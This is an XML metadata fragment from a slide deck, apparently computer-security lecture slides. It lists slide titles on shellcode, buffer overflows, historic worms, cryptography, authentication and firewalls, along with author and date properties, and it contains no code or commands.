      <vt:lpstr>Spawning A Shell</vt:lpstr>
      <vt:lpstr>Small Buffer Overflows</vt:lpstr>
      <vt:lpstr>Shellcode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Removing Null Characters</vt:lpstr>
      <vt:lpstr>Removing Null Characters</vt:lpstr>
      <vt:lpstr>Removing Null Characters</vt:lpstr>
      <vt:lpstr>Removing Null Characters</vt:lpstr>
      <vt:lpstr>Removing Null Characters</vt:lpstr>
      <vt:lpstr>Final Shellcode</vt:lpstr>
      <vt:lpstr>Program Threats (Cont.)</vt:lpstr>
      <vt:lpstr>Program Threats (Cont.)</vt:lpstr>
      <vt:lpstr>A Boot-sector Computer Virus</vt:lpstr>
      <vt:lpstr>The Threat Continues</vt:lpstr>
      <vt:lpstr>System and Network Threats</vt:lpstr>
      <vt:lpstr>System and Network Threats (Cont.)</vt:lpstr>
      <vt:lpstr>The Morris Internet Worm</vt:lpstr>
      <vt:lpstr>System and Network Threats (Cont.)</vt:lpstr>
      <vt:lpstr>System and Network Threats (Cont.)</vt:lpstr>
      <vt:lpstr>Sobig.F Worm</vt:lpstr>
      <vt:lpstr>Cryptography as a Security Tool</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>Encryption</vt:lpstr>
      <vt:lpstr>Encryption (Cont.)</vt:lpstr>
      <vt:lpstr>Symmetric Encryption</vt:lpstr>
      <vt:lpstr>Secure Communication over Insecure Medium</vt:lpstr>
      <vt:lpstr>Asymmetric Encryption</vt:lpstr>
      <vt:lpstr>Asymmetric Encryption (Cont.)</vt:lpstr>
      <vt:lpstr>Asymmetric Encryption Example</vt:lpstr>
      <vt:lpstr>Encryption using RSA Asymmetric Cryptography</vt:lpstr>
      <vt:lpstr>Cryptography (Cont.)</vt:lpstr>
      <vt:lpstr>Authentication</vt:lpstr>
      <vt:lpstr>Authentication (Cont.)</vt:lpstr>
      <vt:lpstr>Authentication – Hash Functions</vt:lpstr>
      <vt:lpstr>Authentication - MAC</vt:lpstr>
      <vt:lpstr>Authentication – Digital Signature</vt:lpstr>
      <vt:lpstr>Authentication (Cont.)</vt:lpstr>
      <vt:lpstr>Key Distribution</vt:lpstr>
      <vt:lpstr>Digital Certificates</vt:lpstr>
      <vt:lpstr>Man-in-the-middle Attack on Asymmetric Cryptography</vt:lpstr>
      <vt:lpstr>Implementation of Cryptography</vt:lpstr>
      <vt:lpstr>Encryption Example - SSL</vt:lpstr>
      <vt:lpstr>User Authentication</vt:lpstr>
      <vt:lpstr>Passwords </vt:lpstr>
      <vt:lpstr>Implementing Security Defenses</vt:lpstr>
      <vt:lpstr>Firewalling to Protect Systems and Networks</vt:lpstr>
      <vt:lpstr>Network Security Through  Domain Separation Via Firewall</vt:lpstr>
      <vt:lpstr>Computer Security Classifications</vt:lpstr>
      <vt:lpstr>Example: Windows 7</vt:lpstr>
      <vt:lpstr>Example: Windows 7 (Cont.)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Games and the Impossibility of Realizable Ideal Functionality</dc:title>
  <dc:creator>Ante Derek</dc:creator>
  <cp:lastModifiedBy>Song Li</cp:lastModifiedBy>
  <cp:revision>7107</cp:revision>
  <cp:lastPrinted>1998-03-10T18:42:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-12T08:12:09Z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1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C:\Documents\cs242\notes\web-slides</vt:lpwstr>
  </property>
</Properties>
</file>